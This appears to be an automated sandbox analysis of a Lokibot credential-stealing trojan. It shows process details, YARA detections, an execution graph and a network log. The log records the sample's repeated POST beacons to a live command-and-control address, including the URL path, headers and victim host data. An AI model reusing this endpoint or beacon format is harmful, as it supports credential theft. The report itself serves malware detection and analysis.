                            Dec 9, 2024 08:53:08.848110914 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:08 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            44192.168.2.64994994.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:09.112591982 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:09.232228994 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:10.512737036 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:10 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            45192.168.2.64995494.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:10.769613981 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:10.889178038 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:12.323381901 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:12 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            46192.168.2.64996094.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:12.583204985 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:12.702697039 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:14.137646914 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:13 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            47192.168.2.64996294.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:14.398693085 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:14.518188953 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:15.952080965 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:15 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            48192.168.2.64996894.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:16.225502968 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:16.345760107 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:17.623614073 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:17 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            49192.168.2.64997394.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:17.899074078 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:18.018611908 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:19.453425884 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:19 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            50192.168.2.64997894.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:19.736536980 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:19.857048035 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:21.134187937 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:20 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            51192.168.2.64998494.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:21.394958019 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:21.514620066 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:23.236313105 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:23 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            52192.168.2.64999094.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:23.508372068 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:23.627768993 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:25.096241951 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:24 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            53192.168.2.64999494.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:25.359930992 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:25.479289055 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:26.917603970 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:26 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            54192.168.2.65000094.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:27.174834967 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:27.294179916 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:31.731527090 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:31 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            55192.168.2.65001494.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:32.131978989 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:32.251367092 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:34.080187082 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:33 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            56192.168.2.65002094.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:34.345973969 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:34.465270996 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:38.905452013 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:38 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            57192.168.2.65003294.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:39.177046061 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:39.296364069 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Target ID:0
                            Start time:02:51:37
                            Start date:09/12/2024
                            Path:C:\Users\user\Desktop\0yWVteGq5T.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\0yWVteGq5T.exe"
                            Imagebase:0x400000
                            File size:98'816 bytes
                            MD5 hash:D7EDE461FD6438CFAE2CBA59FA1E07E9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000000.2104706247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: unknown
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: unknown
                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000000.00000002.3354762092.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:false

                            Reset < >

                              Execution Graph

                              Execution Coverage:31.2%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:4.5%
                              Total number of Nodes:1846
                              Total number of Limit Nodes:93
                              execution_graph 9697 40c640 9724 404bee 9697->9724 9700 40c70f 9701 404bee 6 API calls 9702 40c66b 9701->9702 9703 40c708 9702->9703 9705 404bee 6 API calls 9702->9705 9704 402bab 2 API calls 9703->9704 9704->9700 9706 40c683 9705->9706 9708 404bee 6 API calls 9706->9708 9711 40c701 9706->9711 9707 402bab 2 API calls 9707->9703 9709 40c694 9708->9709 9718 40c6f8 9709->9718 9731 40c522 9709->9731 9710 402bab 2 API calls 9710->9711 9711->9707 9713 40c6a9 9714 40c6ef 9713->9714 9715 405872 4 API calls 9713->9715 9716 402bab 2 API calls 9714->9716 9717 40c6c5 9715->9717 9716->9718 9719 405872 4 API calls 9717->9719 9718->9710 9720 40c6d5 9719->9720 9721 405872 4 API calls 9720->9721 9722 40c6e7 9721->9722 9723 402bab 2 API calls 9722->9723 9723->9714 9725 402b7c 2 API calls 9724->9725 9726 404bff 9725->9726 9727 4031e5 4 API calls 9726->9727 9730 404c3b 9726->9730 9728 404c28 9727->9728 9729 402bab 2 API calls 9728->9729 9728->9730 9729->9730 9730->9700 9730->9701 9732 402b7c 2 API calls 9731->9732 9733 40c542 9732->9733 9733->9713 9734 405941 9735 4031e5 4 API calls 9734->9735 9736 405954 9735->9736 8301 409046 8314 413b28 8301->8314 8303 40906d 8305 405b6f 6 API calls 8303->8305 8304 40904e 8304->8303 8306 403fbf 7 API calls 8304->8306 8307 40907c 8305->8307 8306->8303 8308 409092 8307->8308 8318 409408 8307->8318 8310 4090a3 8308->8310 8313 402bab 2 API calls 8308->8313 8312 402bab 2 API calls 8312->8308 8313->8310 8315 413b31 8314->8315 8316 413b38 8314->8316 8317 404056 6 API calls 8315->8317 8316->8304 8317->8316 8319 409413 8318->8319 8320 40908c 8319->8320 8332 409d36 8319->8332 8320->8312 8331 40945c 8438 40a35d 8331->8438 8333 409d43 8332->8333 8334 40a35d 4 API calls 8333->8334 8335 409d55 8334->8335 8336 4031e5 4 API calls 8335->8336 8337 409d8b 8336->8337 8338 4031e5 4 API calls 8337->8338 8339 409dd0 8338->8339 8340 405b6f 6 API calls 8339->8340 8371 409423 8339->8371 8342 409df7 8340->8342 8341 409e1c 8343 4031e5 4 API calls 8341->8343 8341->8371 8342->8341 8345 402bab 2 API calls 8342->8345 8344 409e62 8343->8344 8346 4031e5 4 API calls 8344->8346 8345->8341 8347 409e82 8346->8347 8348 4031e5 4 API calls 8347->8348 8349 409ea2 8348->8349 8350 4031e5 4 API calls 8349->8350 8351 409ec2 8350->8351 8352 4031e5 4 API calls 8351->8352 8353 409ee2 8352->8353 8354 4031e5 4 API calls 8353->8354 8355 409f02 8354->8355 8356 4031e5 4 API calls 8355->8356 8357 409f22 8356->8357 8358 4031e5 4 API calls 8357->8358 8361 409f42 8358->8361 8359 40a19b 8360 408b2c 4 API calls 8359->8360 8360->8371 8361->8359 8362 409fa3 8361->8362 8363 405b6f 6 API calls 8362->8363 8362->8371 8365 409fbd 8363->8365 8364 40a02c 8366 4031e5 4 API calls 8364->8366 8392 40a16d 8364->8392 8365->8364 8367 402bab 2 API calls 8365->8367 8368 40a070 8366->8368 8370 409fd7 8367->8370 8373 4031e5 4 API calls 8368->8373 8369 402bab 2 API calls 8369->8371 8372 405b6f 6 API calls 8370->8372 8371->8331 8394 4056bf 8371->8394 8375 409fe5 8372->8375 8374 40a090 8373->8374 8377 4031e5 4 API calls 8374->8377 8375->8364 8376 402bab 2 API calls 8375->8376 8378 409fff 8376->8378 8379 40a0b0 8377->8379 8380 405b6f 6 API calls 8378->8380 8382 4031e5 4 API calls 8379->8382 8381 40a00d 8380->8381 8381->8364 8384 40a021 8381->8384 8383 40a0d0 8382->8383 8385 4031e5 4 API calls 8383->8385 8386 402bab 2 API calls 8384->8386 8387 40a0f0 8385->8387 8386->8371 8388 4031e5 4 API calls 8387->8388 8389 40a110 8388->8389 8390 4031e5 4 API calls 8389->8390 8393 40a134 8389->8393 8390->8393 8392->8369 8392->8371 8393->8392 8448 408b2c 8393->8448 8395 402b7c 2 API calls 8394->8395 8396 4056cd 8395->8396 8397 402b7c 2 API calls 8396->8397 8398 4056d4 8396->8398 8397->8398 8399 408c4d 8398->8399 8400 413ba4 6 API calls 8399->8400 8401 408c5c 8400->8401 8402 408f02 8401->8402 8403 408f3a 8401->8403 8406 40903e 8401->8406 8405 405b6f 6 API calls 8402->8405 8404 405b6f 6 API calls 8403->8404 8420 408f51 8404->8420 8407 408f0c 8405->8407 8422 413aca 8406->8422 8407->8406 8411 408f31 8407->8411 8451 40a1b6 8407->8451 8409 405b6f 6 API calls 8409->8420 8410 402bab 2 API calls 8410->8406 8411->8410 8413 409031 8414 402bab 2 API calls 8413->8414 8414->8411 8415 409022 8416 402bab 2 API calls 8415->8416 8417 409028 8416->8417 8418 402bab 2 API calls 8417->8418 8418->8411 8419 402bab GetProcessHeap HeapFree 8419->8420 8420->8406 8420->8409 8420->8411 8420->8413 8420->8415 8420->8419 8421 40a1b6 14 API calls 8420->8421 8485 4044ee 8420->8485 8421->8420 8423 413ad7 8422->8423 8431 409451 8422->8431 8424 405781 4 API calls 8423->8424 8425 413af0 8424->8425 8426 405781 4 API calls 8425->8426 8427 413afe 8426->8427 8428 405762 4 API calls 8427->8428 8429 413b0e 8428->8429 8430 405781 4 API calls 8429->8430 8429->8431 8430->8431 8432 405695 8431->8432 8433 4056a0 8432->8433 8434 4056b9 8432->8434 8435 402bab 2 API calls 8433->8435 8434->8331 8436 4056b3 8435->8436 8437 402bab 2 API calls 8436->8437 8437->8434 8439 40a39a 8438->8439 8440 40a368 8438->8440 8441 4031e5 4 API calls 8439->8441 8442 40a3af 8439->8442 8446 4031e5 4 API calls 8440->8446 8441->8442 8443 408b2c 4 API calls 8442->8443 8445 40a3ca 8442->8445 8443->8445 8444 40a38a 8444->8320 8445->8444 8447 408b2c 4 API calls 8445->8447 8446->8444 8447->8444 8449 4031e5 4 API calls 8448->8449 8450 408b3e 8449->8450 8450->8392 8452 40a202 8451->8452 8453 40a1c3 8451->8453 8607 405f08 8452->8607 8455 405b6f 6 API calls 8453->8455 8457 40a1d0 8455->8457 8456 40a1fc 8456->8411 8457->8456 8460 40a1f3 8457->8460 8495 40a45b 8457->8495 8459 40a333 8461 402bab 2 API calls 8459->8461 8463 402bab 2 API calls 8460->8463 8461->8456 8463->8456 8464 405b6f 6 API calls 8466 40a245 8464->8466 8465 40a25d 8467 405b6f 6 API calls 8465->8467 8466->8465 8468 413a58 13 API calls 8466->8468 8473 40a26b 8467->8473 8470 40a257 8468->8470 8469 40a28b 8471 405b6f 6 API calls 8469->8471 8472 402bab 2 API calls 8470->8472 8477 40a297 8471->8477 8472->8465 8473->8469 8474 40a284 8473->8474 8614 40955b 8473->8614 8476 402bab 2 API calls 8474->8476 8476->8469 8479 40a2b0 8477->8479 8482 40a2b7 8477->8482 8621 40968e 8477->8621 8478 405b6f 6 API calls 